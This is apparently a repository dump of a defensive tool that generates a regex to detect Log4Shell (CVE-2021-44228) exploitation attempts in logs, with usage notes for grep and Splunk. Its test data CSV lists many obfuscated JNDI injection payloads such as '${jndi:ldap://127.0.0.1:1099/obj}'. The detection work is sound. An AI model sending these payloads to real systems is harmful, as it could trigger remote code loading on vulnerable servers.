pipeline; \`xargs -r\` avoids running \`grep\` on stdin when \`find\` returns nothing. 91 | \`\`\`bash 92 | eval "\$(./RegEx_Generator.sh)" 93 | find /var/log -name "*.log" -print0 | xargs -0 -r grep -P "\${Log4ShellRex}" 94 | \`\`\` 95 | 96 | \`\`\`bash 97 | find /var/log -name "*.log" -print0 | xargs -0 -r grep -P '${Log4ShellRex}' 98 | \`\`\` 99 | 100 | ## Hunting in your logs using Splunk 101 | 102 | You can use this RegEx to search your indexed logs using the \`| regex\` 103 | [SPL](https://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Regex) command. Note that every backslash in the RegEx has to be doubled inside the double-quoted SPL string; the second example below is already escaped. 104 | 105 | \`\`\`spl 106 | index=<...> sourcetype=<...> 107 | | regex "<RegEx with every backslash doubled>" 108 | \`\`\` 109 | 110 | \`\`\`spl 111 | index=<...> sourcetype=<...> 112 | | regex "${Log4ShellRex//\\/\\\\}" 113 | \`\`\` 114 | 115 | ## Screenshot 116 | 117 | **regex101** 118 | ![Example Screenshot regex101](screenshots/example_4a.png) 119 | 120 | **grep -P** 121 | ![Example Screenshot Shell](screenshots/example_4b.png) 122 | 123 | **Splunk** 124 | ![Example Screenshot Splunk](screenshots/example_4c.jpeg) 125 | 126 | **Graphical representation of the RegEx** 127 | ![Graphical representation of the RegEx](screenshots/viz_4.png) 128 | (Created using regexper tool from Jeff Avallone, licensed under 129 | [CC BY license](https://creativecommons.org/licenses/by/3.0/).)
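
## Other

**Please create a pull request / issue if you can provide syntax for more systems.**

## Credits

I got help and ideas from:

- [@cyberops](https://twitter.com/cyb3rops) building [log4shell-detector](https://github.com/Neo23x0/log4shell-detector/) that served as an inspiration
- [@karanlyons](https://github.com/karanlyons) providing corpus to test against
EOF
--------------------------------------------------------------------------------
/RegEx_Generator.sh:
--------------------------------------------------------------------------------
#!/bin/bash
#
# Prints the Log4Shell-Rex pattern as a shell assignment
#
#   Log4ShellRex='...'
#
# on stdout, so that callers can `eval "$(./RegEx_Generator.sh)"` (README.sh
# does exactly that). With "-buildAlphabet" as the first argument, the
# "Alphabet" fragment file is regenerated from Alphabet.java before the pattern
# is assembled.
#
# Exit status is non-zero when javac/java are missing (only with
# -buildAlphabet), when the Alphabet file is absent, or when it contains
# anything other than comments and plain name='...' assignments.
#
#  _             _  _  ____  _            _ _        ____
# | |    ___   __ _| || |/ ___|| |__   ___| | |     |  _ \ _____  __
# | |   / _ \ / _` || |\___ \| '_ \ / _ \ | |_____| |_) / _ \ \/ /
# | |__| (_) | (_| |__   _|__) | | | |  __/ | |_____|  _ <  __/>  <
# |_____\___/ \__, |  |_||____/|_| |_|\___|_|_|     |_| \_\___/_/\_\
#             |___/
#
# 2021-12-13 @back2root

# -e: stop at the first failing command; -u: an unset variable is an error, so
# a missing or misspelled ${letter} fails loudly instead of silently leaving a
# hole in the pattern; pipefail: a pipeline fails if any of its stages fails.
set -euo pipefail

# Resolve everything relative to the script's own directory so the generator
# works no matter where it is invoked from. "Alphabet", Alphabet.java and the
# compiled Alphabet.class all live next to this script.
script_dir=$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)
alphabet_file="${script_dir}/Alphabet"

# ASCII-art banner (the same one as in the header comment) to stderr, so it
# never ends up in the stdout that callers eval.
base64 -d <<< "IF8gICAgICAgICAgICAgICAgXyAgXyAgX19fXyAgXyAgICAgICAgICBfIF8gICAgICAgX19fXwp8IHwgICAgX19fICAgX18gX3wgfHwgfC8gX19ffHwgfF9fICAgX19ffCB8IHwgICAgIHwgIF8gXCBfX19fXyAgX18KfCB8ICAgLyBfIFwgLyBfYCB8IHx8IHxcX19fIFx8ICdfIFwgLyBfIFwgfCB8X19fX198IHxfKSAvIF8gXCBcLyAvCnwgfF9ffCAoXykgfCAoX3wgfF9fICAgX3xfXykgfCB8IHwgfCAgX18vIHwgfF9fX19ffCAgXyA8ICBfXy8+ICA8CnxfX19fX1xfX18vIFxfXywgfCAgfF98fF9fX18vfF98IHxffFxfX198X3xffCAgICAgfF98IFxfXF9fXy9fL1xfXAogICAgICAgICAgICB8X19fLwoK" >&2

# Build Alphabet if requested. "${1:-}" keeps `set -u` happy when the script
# is called without arguments (the README recommends exactly that).
if [ "${1:-}" == "-buildAlphabet" ]; then
  javac=$(command -v javac) || { echo "javac not found in PATH" >&2; exit 1; }
  java=$(command -v java) || { echo "java not found in PATH" >&2; exit 1; }

  "${javac}" "${script_dir}/Alphabet.java"
  # Write to a temporary file first: the redirect truncates the target before
  # `java` starts, so a failing run would otherwise leave a truncated Alphabet
  # behind and the next invocation would source a half-written file.
  tmp_alphabet="${alphabet_file}.tmp"
  "${java}" -cp "${script_dir}" "Alphabet" > "${tmp_alphabet}"
  mv "${tmp_alphabet}" "${alphabet_file}"
fi

# "Alphabet" is executed as shell code by `source`, and its values are
# embedded in the Log4ShellRex='...' assignment that callers eval. Refuse to
# source it unless every line is blank, a comment, or a single-quoted
# assignment `name='...'` whose value contains no quote character. That is the
# only form the checked-in Alphabet uses, and it guarantees that the
# single-quoted assignment printed at the end cannot be broken out of.
if [ ! -r "${alphabet_file}" ]; then
  echo "${alphabet_file} not found or not readable; run '$0 -buildAlphabet' first" >&2
  exit 1
fi
q="'"
alphabet_line_re="^(#.*)?\$|^[a-z_]+=${q}[^${q}]*${q}\$"
if grep -Evq "${alphabet_line_re}" "${alphabet_file}"; then
  echo "${alphabet_file} contains lines that are not comments or plain name='...' assignments; refusing to source it" >&2
  exit 1
fi

# Separator permitted between any two characters of a keyword: anything but a
# newline, as little as possible. This is what makes split-up payloads such as
# ${env:NaN:-j}ndi (see testdata) match. It also gives backtracking engines a
# lot of freedom on long lines, which is why the pattern looks for `${` before
# anything else.
sp='[^\n]*?'
# shellcheck source=./Alphabet
source "${alphabet_file}"

# String groups: each keyword is spelled letter by letter with ${sp} in
# between; the ${letter} fragments come from Alphabet and cover the plain,
# URL-encoded, unicode- and octal-escaped forms of that character.
jndi="${j}${sp}${n}${sp}${d}${sp}${i}"

ldaps="${l}${sp}${d}${sp}${a}${sp}${p}(?:${sp}${s})?"
rmi="${r}${sp}${m}${sp}${i}"
dns="${d}${sp}${n}${sp}${s}"
nis="${n}${sp}${i}${sp}${s}"
iiop="(?:${sp}${i}){2}${sp}${o}${sp}${p}"
corba="${c}${sp}${o}${sp}${r}${sp}${b}${sp}${a}"
nds="${n}${sp}${d}${sp}${s}"
https="${h}(?:${sp}${t}){2}${sp}${p}(?:${sp}${s})?"

# Target RegEx
# ${jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):

protocols="(${ldaps}|${rmi}|${dns}|${nis}|${iiop}|${corba}|${nds}|${https})"

# Base64 of "${j" at the three possible alignments inside a base64 stream;
# this is the "rudimentary" Base64 support mentioned in the README.
b64_enc='(JH[s-v]|[\x2b\x2f-9A-Za-z][CSiy]R7|[\x2b\x2f-9A-Za-z]{2}[048AEIMQUYcgkosw]ke[\x2b\x2f-9w-z])'
b64="${b}${sp}${a}${sp}${s}${sp}${e}${sp}${colon}${b64_enc}"

plain="${jndi}${sp}${colon}${sp}${protocols}${sp}${colon}"

# (?im): case-insensitive, multi-line. Every match starts at a line start and
# requires a `${` before either the plain jndi:<protocol>: form or the
# base64: form.
Log4ShellRex="(?im)(?:^|[\n]).*?${dollar}${curly_open}${sp}(${plain}|${b64})"

# Single-quoted on purpose: the value may only contain the characters admitted
# by the Alphabet check above plus the literal fragments of this script, none
# of which is a single quote, so the line is safe to eval.
echo "Log4ShellRex='${Log4ShellRex}'"
--------------------------------------------------------------------------------
/screenshots/example_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/back2root/log4shell-rex/54de449903e274a9f47573dedcfe832cc50a04b5/screenshots/example_1.png
--------------------------------------------------------------------------------
/screenshots/example_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/back2root/log4shell-rex/54de449903e274a9f47573dedcfe832cc50a04b5/screenshots/example_2.png
--------------------------------------------------------------------------------
/screenshots/example_3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/back2root/log4shell-rex/54de449903e274a9f47573dedcfe832cc50a04b5/screenshots/example_3.png
--------------------------------------------------------------------------------
/screenshots/example_4a.png:
--------------------------------------------------------------------------------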
https://raw.githubusercontent.com/back2root/log4shell-rex/54de449903e274a9f47573dedcfe832cc50a04b5/screenshots/example_4a.png -------------------------------------------------------------------------------- /screenshots/example_4b.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/back2root/log4shell-rex/54de449903e274a9f47573dedcfe832cc50a04b5/screenshots/example_4b.png -------------------------------------------------------------------------------- /screenshots/example_4c.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/back2root/log4shell-rex/54de449903e274a9f47573dedcfe832cc50a04b5/screenshots/example_4c.jpeg -------------------------------------------------------------------------------- /screenshots/viz_4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/back2root/log4shell-rex/54de449903e274a9f47573dedcfe832cc50a04b5/screenshots/viz_4.png -------------------------------------------------------------------------------- /testdata/cve-2021-44228.csv: -------------------------------------------------------------------------------- 1 | _raw 2 | \044%7B\\44{env:NOTHING:-j}\u0024{lower:N}\\u0024{lower:${upper:d}}}i:dns:/addr} 3 | ${${::-j}nd${upper:ı}:rm${upper:ı}://addr} 4 | ${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}} 5 | ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//addr} 6 | ${jndi:${lower:l}${lower:d}a${lower:p}://$a{upper:d}dr} 7 | ${jndi:${lower:l}${lower:d}a${lower:p}://addr 8 | ${jndi:dns://addr} 9 | ${jndi:dns:${jndi:pwd}${jndi:pwd}addr} 10 | %24%7B%6a%6e%64%24%7B%75%70%70%65%72%3a%C4%B1%7D%3a%6c%64%61%70%3a%2f%2f 11 | %2524%257B%256a%256e%2564%2524%257B%2575%2570%2570%2565%2572%253a%25C4%25B1%257D%253a%256c%2564%2561%2570%253a%252f%252f%0A 12 | "YYYY-MM-DD prefix1 13 | prefix2 ${jndi:dns://addr} suffix" 14 | 
${jndi:ldap://127.0.0.1:1099/obj} 15 | ${${upper:j}n${lower:d}${lower:i}:l${lower:d}${lower:a}${lower:p}${lower::}${lower:/}${lower:/}1${lower:2}${lower:7}.0${lower:.}0${lower:.}${lower:1}${lower::}10${lower:9}9${lower:/}o${lower:b}j} 16 | ${${upper:j}${lower:n}${lower:d}${lower:i}${lower::}${lower:l}${lower:d}${lower:a}${lower:p}${lower::}${lower:/}${lower:/}${lower:1}${lower:2}${lower:7}${lower:.}${lower:0}${lower:.}${lower:0}${lower:.}${lower:1}${lower::}${lower:1}${lower:0}${lower:9}${lower:9}${lower:/}${lower:o}${lower:b}${lower:j}} 17 | ${jndi:ld${ozI:Kgh:Qn:TXM:-a}p:${DBEau:Y:pLXUu:SfRKk:vWu:-/}${x:UMADq:-/}127${lt:tWd:iEVW:pD:tGCr:-.}${jFpSDW:z:SN:AuqM:C:-0}${dxxilc:HTFa:QLgii:pv:-.}0.${a:l:urnrtk:-1}:1099${zlSEqQ:T:qg:o:-/}ob${E:yJDsbq:-j}} 18 | ${${eh:wDUdos:jKY:-j}${xksV:Xgi:-n}${hNdb:SbmXU:goWgvJ:iqAV:Ux:-d}${MXWN:oOi:c:UxXzcI:-i}${DYKgs:tHlY:-:}${d:FHdMm:fw:-l}${Gw:-d}${LebGxe:c:SxLXa:-a}${echyWc:BE:NBO:s:gVbT:-p}${l:QwCL:gzOQm:gqsDS:-:}${qMztLn:e:E:WS:-/}${NUu:S:afVNbT:kyjbiE:-/}${PtGUfI:WcYh:c:-1}${YoSJ:KUV:uySK:crNTm:-2}${EwkY:EsX:S:wk:-7}${HUWOJ:MMIxOn:S:-.}${MHF:s:-0}${obrJVU:RPw:d:A:-.}${E:RgY:j:-0}${MaOtbM:-.}${O:-1}${zzfuGD:YEyvy:mhp:T:-:}${vlaw:WuOBz:-1}${HAjxt:ziBgmc:-0}${UKVBrk:sNAKe:F:qXNetQ:mdIuOW:-9}${geJs:sgYgQW:oOd:qOGf:aYpAkP:-9}${UonINv:-/}${aTygHK:pbQiTB:KkXhKS:-o}${FMRAKM:-b}${wiu:vKIVuh:-j}} 19 | --------------------------------------------------------------------------------